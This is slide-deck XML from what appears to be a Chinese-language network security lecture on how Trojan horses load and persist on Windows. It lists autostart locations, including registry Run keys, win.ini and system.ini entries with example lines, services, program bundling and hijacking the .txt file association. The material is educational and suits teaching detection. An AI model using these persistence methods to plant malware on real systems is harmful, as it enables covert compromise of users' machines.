                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="461"/>
                  <a:pt x="302" y="545"/>
                  <a:pt x="438" y="590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="574" y="635"/>
                  <a:pt x="710" y="635"/>
                  <a:pt x="847" y="635"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="571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60" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4140200" y="5157788"/>
            <a:ext cx="1295400" cy="792162"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 816"/>
              <a:gd name="T1" fmla="*/ 363 h 499"/>
              <a:gd name="T2" fmla="*/ 408 w 816"/>
              <a:gd name="T3" fmla="*/ 453 h 499"/>
              <a:gd name="T4" fmla="*/ 544 w 816"/>
              <a:gd name="T5" fmla="*/ 90 h 499"/>
              <a:gd name="T6" fmla="*/ 816 w 816"/>
              <a:gd name="T7" fmla="*/ 0 h 499"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 816"/>
              <a:gd name="T13" fmla="*/ 0 h 499"/>
              <a:gd name="T14" fmla="*/ 816 w 816"/>
              <a:gd name="T15" fmla="*/ 499 h 499"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="816" h="499">
                <a:moveTo>
                  <a:pt x="0" y="363"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="158" y="431"/>
                  <a:pt x="317" y="499"/>
                  <a:pt x="408" y="453"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="499" y="407"/>
                  <a:pt x="476" y="165"/>
                  <a:pt x="544" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="612" y="15"/>
                  <a:pt x="714" y="7"/>
                  <a:pt x="816" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150">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5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85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5" grpId="0"/>
      <p:bldP spid="108557" grpId="0"/>
      <p:bldP spid="108558" grpId="0" animBg="1"/>
      <p:bldP spid="108559" grpId="0" animBg="1"/>
      <p:bldP spid="10856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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>开始菜单启动项，基本上没有木马会用这种方式。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自动启动：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Winstart.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中启动。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Autoexec.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Config.sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中加载运行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注册表：隐蔽性强，多数木马采用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>win.ini/system.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：有部分木马采用，不太隐蔽。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>捆绑方式启动：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>捆绑到一般的常用程序或服务上。隐蔽性强，多数木马采用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>黑客确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>捆绑方式、捆绑位置、捆绑程序等，位置多变使木马有很强的隐蔽性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>非捆绑：在注册表等位置留下痕迹，容易被发现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>修改文件关联</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168962" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>特洛伊木马加载及启动方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B89E7E2B-77B0-4492-93D0-3240C2BDF6BA}"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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Win.ini:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    [Windows]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>run=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>c:\windows\file.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>load=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>c:\windows\file.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" u="sng" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> System.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>[boot]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    shell=explorer.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>file.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" u="sng" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>加载方式－启动文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F19E98FC-B914-4C78-8ED5-AE6399B1476F}"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A9342A4-44D2-451A-81C2-421D11A681F5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415746" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载方式－注册表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415747" name="Picture 3" descr="regrun"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1268760"/>
            <a:ext cx="7416800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415748" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="5517232"/>
            <a:ext cx="7920037" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin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5747"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415747"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4157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5748"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415748"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415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14AAA6A1-630E-4037-B9B3-B87E4CFD132C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417794" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="228600"/>
            <a:ext cx="7793038" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载方式－服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="417795" name="Picture 3" descr="未命名"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1470025"/>
            <a:ext cx="7416800" cy="5235575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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gtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417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正常情况：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Notepad.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>打开。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关联木马：修改关联方式，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关联到木马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HKEY_CLASSES_ROOT\txtfile\shell\open\command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>%SystemRoot%\system32\NOTEPAD.EXE %1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%path%……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>加载方式－修改文件关联</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94A8ED9E-E3D7-458B-9289-ACE75DC6EF89}"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en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>模型不能描述网络安全的动态螺旋上升过程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>风险分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>制定策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防御系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>实时检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>实时响应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>灾难恢复</a:t>
            </a:r>
